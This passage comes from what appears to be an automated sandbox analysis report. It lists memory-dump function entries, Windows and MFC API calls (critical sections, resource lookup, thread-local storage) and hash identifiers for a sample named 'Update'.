                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateH_prolog3MenuPopup
                                              • String ID: T}4l
                                              • API String ID: 2466797239-3324797550
                                              • Opcode ID: e1b34f6b0d012e83a51893f095ec7c83a732e856691cc80d0ff93afcb642852d
                                              • Instruction ID: 1f34f1fa007597cda1a14e3bb05101f18a3c80eaf696c957fdcb5f88098168c0
                                              • Opcode Fuzzy Hash: e1b34f6b0d012e83a51893f095ec7c83a732e856691cc80d0ff93afcb642852d
                                              • Instruction Fuzzy Hash: DB21C0B5A0061ADFDF04DFA4C5897EEBBB1AF45304F10006EE91AAB790DF709A44CB91
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C21CE18
                                              • FindResourceW.KERNEL32(?,?,STYLE_XML,?,?,00000004,6C1E86F9,?,00000000), ref: 6C21CE56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FindH_prolog3Resource
                                              • String ID: STYLE_XML
                                              • API String ID: 3036663282-3909253476
                                              • Opcode ID: deceb8447d12a26672aca2651ad132ea3964376fad8796cdd8d990d46a07fed5
                                              • Instruction ID: 48add3bea00ae56982983ada768e5b98c45f07fa3cc90a400c7d21d300d7d656
                                              • Opcode Fuzzy Hash: deceb8447d12a26672aca2651ad132ea3964376fad8796cdd8d990d46a07fed5
                                              • Instruction Fuzzy Hash: 9CF0CDB9A08219DBDB10BBB49840AAF72BCBF9A6187101526FA96D6F40CB34C414DA21
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C3A0410,?,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8A1
                                              • InitializeCriticalSection.KERNEL32(00000000,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8B7
                                              • LeaveCriticalSection.KERNEL32(6C3A0410,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8C5
                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8D2
                                                • Part of subcall function 6C1EC908: InitializeCriticalSection.KERNEL32(6C3A0410,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC920
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterInitialize$Leave
                                              • String ID:
                                              • API String ID: 713024617-0
                                              • Opcode ID: 208f6e96431b95f33e3202e72df47696f5b1d27735ef994eb2a39d629a37e827
                                              • Instruction ID: d848f9a029b2ad234209a0de34182bc85ea900bff7ab8cf039ec4193ee7a75f9
                                              • Opcode Fuzzy Hash: 208f6e96431b95f33e3202e72df47696f5b1d27735ef994eb2a39d629a37e827
                                              • Instruction Fuzzy Hash: 92F0C2727012189FDA442B94DC58B9D7E7CFB5B32AF440129E103C2841C734C861CEA2
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C3A04E0,?,?,?,?,6C1EEBCB,00000000,00000004,6C1E0223,6C1DA338,6C1E419C,?,6C1D871F), ref: 6C1EEAB2
                                              • TlsGetValue.KERNEL32(6C3A04C4,?,?,?,?,6C1EEBCB,00000000,00000004,6C1E0223,6C1DA338,6C1E419C,?,6C1D871F), ref: 6C1EEAC6
                                              • LeaveCriticalSection.KERNEL32(6C3A04E0,?,?,?,?,6C1EEBCB,00000000,00000004,6C1E0223,6C1DA338,6C1E419C,?,6C1D871F), ref: 6C1EEAE0
                                              • LeaveCriticalSection.KERNEL32(6C3A04E0,?,?,?,?,6C1EEBCB,00000000,00000004,6C1E0223,6C1DA338,6C1E419C,?,6C1D871F), ref: 6C1EEAEB
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterValue
                                              • String ID:
                                              • API String ID: 3969253408-0
                                              • Opcode ID: e2869a4f90c780110e6a4d0b3d94c3a44eee4e5895b706ac94faf8c2d0a237d1
                                              • Instruction ID: d7650932f1dfbfe67fd3dfb52d41ce8982670c59e2a4254acb424efd76130410
                                              • Opcode Fuzzy Hash: e2869a4f90c780110e6a4d0b3d94c3a44eee4e5895b706ac94faf8c2d0a237d1
                                              • Instruction Fuzzy Hash: 75F09072202525AFDB009F15C89494BF77CFF8B765305401AF806D7A20C770E985CBD1